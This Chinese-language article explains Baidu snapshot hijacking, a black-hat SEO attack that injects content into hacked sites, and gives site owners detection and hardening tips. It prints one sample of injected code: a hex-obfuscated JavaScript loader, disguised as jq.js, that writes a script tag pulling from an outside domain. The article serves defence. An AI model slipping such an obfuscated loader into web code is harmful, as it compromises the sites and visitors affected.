最近不少朋友像361源碼網(wǎng)反應(yīng)說(shuō),自己的網(wǎng)站有些莫名其妙的搜索關(guān)鍵詞來(lái)到網(wǎng)站,開(kāi)始以為是黑客攻擊,可以觀察了一段時(shí)間并沒(méi)有發(fā)現(xiàn)什么異常,由此初步懷疑是百度快照劫持,首先了解下什么是快照劫持。
百度快照劫持就是黑客通過(guò)技術(shù)手段拿到你網(wǎng)站FTP權(quán)限或者數(shù)據(jù)庫(kù)權(quán)限植入代碼或添加劫持腳本,把他想要的內(nèi)容寫進(jìn)一個(gè)頁(yè)面代碼里,在首頁(yè)Head標(biāo)簽下調(diào)用,當(dāng)搜索引擎訪問(wèn)你網(wǎng)站的時(shí)候抓取到你網(wǎng)站的標(biāo)題-關(guān)鍵詞-描述的時(shí)候,就會(huì)抓取到黑客設(shè)定的任何內(nèi)容!
一般用site命令查看百度快照情況,如
site:tao2t.com如果看到和你寫的標(biāo)題、描述不一樣,就可以判斷是黑客對(duì)快照進(jìn)行劫持。了解常見(jiàn)的劫持方法,防患于未然,保障網(wǎng)站安全。
從上面的截圖看來(lái)中標(biāo)的不在少數(shù)哇,點(diǎn)擊“百度快照”查看快照信息,標(biāo)題、描述、關(guān)鍵詞都正常,時(shí)間也是較新的。嘗試投訴快照,情況依舊,就給百度反應(yīng)情況,還在等待回復(fù)中。
除了找百度解決問(wèn)題之前,還需要對(duì)自己的網(wǎng)站進(jìn)行查找、修復(fù)等操作,以免再次受到攻擊。
一 放到<head>標(biāo)簽網(wǎng)站設(shè)計(jì)中<head>標(biāo)簽里面有標(biāo)題、描述、關(guān)鍵詞等內(nèi)容,這部分是明顯寫上去的,如果是寫到生成后的靜態(tài)首頁(yè)html文件里,每次更新首頁(yè)都會(huì)消失。但如果不久后又被修改了,就有可能是通過(guò)其他木馬定時(shí)修改的,要注意找出來(lái)。
以DedeCMS為例,有些文件夾是禁止執(zhí)行腳本的,所以能修改你的文件肯定在能執(zhí)行的文件夾內(nèi),如果對(duì)文件結(jié)構(gòu)不是很熟悉的,可以和官方的文件夾進(jìn)行對(duì)比就能找出問(wèn)題所在。
二 偽裝JS文件、修改PHP文件這個(gè)我們你一定經(jīng)歷過(guò),比如DedeCMS的版權(quán)信息,如果你用{dede:global.cfg_poweby/},后面都會(huì)加上自帶的織夢(mèng)鏈接;下載的模板會(huì)在友情鏈接里面加入模板開(kāi)發(fā)者的友情鏈接,這些鏈接是在模板里面看不到的,每次刷新位置都不一樣。
需要注意的是,瀏覽器并不識(shí)別JS腳本,如果用JS的方式插入鏈接,在查看源代碼里面是完全看不到具體內(nèi)容的。其實(shí)這個(gè)方法也并不高級(jí),常見(jiàn)的如:
<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>該js文件里面有類似這樣的代碼:
var _$=["/x3c/x73/x63/x72/x69/x70/x74/x20/x73/x72/x63/x3d/x68/x74/x74/x70/x3a/////x77/x77/x77/x2e/x77/x7a/x62/x33/x36/x30/x2e/x74/x6b///x69/x6d/x61/x67/x65/x2e/x67/x69/x66/x3e/x3c///x73/x63/x72/x69/x70/x74/x3e"];document.writeln(_$[0]);第一句是通過(guò)加密的代碼,第二句輸出內(nèi)容,一般服務(wù)器做特殊處理,才能輸出正確的內(nèi)容,所以應(yīng)該還有一些PHP文件。
PHP有許多包含的寫法,比如/include文件夾,在核心的PHP文件里面加入劫持代碼,神不知鬼不覺(jué)。
上面的方法都是比較常見(jiàn)的,一般的CMS有一定的防護(hù)能力,只要自己的數(shù)據(jù)庫(kù)、服務(wù)器密碼不泄露,這些都能及時(shí)解決。
三 你已經(jīng)成為黑客的“肉雞”“肉雞”可能很多人不太理解,說(shuō)白了,服務(wù)器、數(shù)據(jù)庫(kù)已經(jīng)被黑客拿到了,或者說(shuō)獲得修改權(quán)限。
百度有主動(dòng)提交(投訴)快照的功能,黑客可以在晚上無(wú)人值守的時(shí)候偷偷修改模板文件,生成主頁(yè)后向百度提交URL,然后再回復(fù)成原來(lái)的樣子。
快照劫持總結(jié)黑客通過(guò)快照劫持代碼能實(shí)現(xiàn)百度快照劫持,是黑帽SEO比較早的技術(shù),通過(guò)劫持webshell網(wǎng)站,實(shí)現(xiàn)自己的網(wǎng)站排名,主要功能是改變webshell網(wǎng)站的快照,使其快照顯示為你設(shè)置的快照,這個(gè)時(shí)候?qū)Ψ降木W(wǎng)站快照(包括標(biāo)題,關(guān)鍵字,描述都變成你的)。
代碼通過(guò)實(shí)現(xiàn)快照變成你的,當(dāng)然排名也變成你的,通過(guò)內(nèi)置的跳轉(zhuǎn)代碼,每次通過(guò)搜索引擎點(diǎn)進(jìn)去,網(wǎng)站就會(huì)跳轉(zhuǎn)到其他網(wǎng)站。這就是百度快照劫持的原理,以及更高級(jí)的301權(quán)重劫持手法!
說(shuō)了這么多的快照劫持,相信你已經(jīng)明白了大概,或許你現(xiàn)在也遇到這樣的情況,361源碼網(wǎng)提醒你幾點(diǎn)處理方法:
1、服務(wù)器、虛擬空間FTP的安全設(shè)置
2、網(wǎng)站漏洞的檢查和補(bǔ)丁的及時(shí)更新
3、網(wǎng)站以及數(shù)據(jù)庫(kù)的及時(shí)備份
4、網(wǎng)站文件、文件夾的權(quán)限設(shè)置等
以上就是什么是快照劫持、快照劫持了怎么辦的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)和解決疑問(wèn)有所幫助,也希望大家多多支持武林網(wǎng)。
新聞熱點(diǎn)
疑難解答
圖片精選
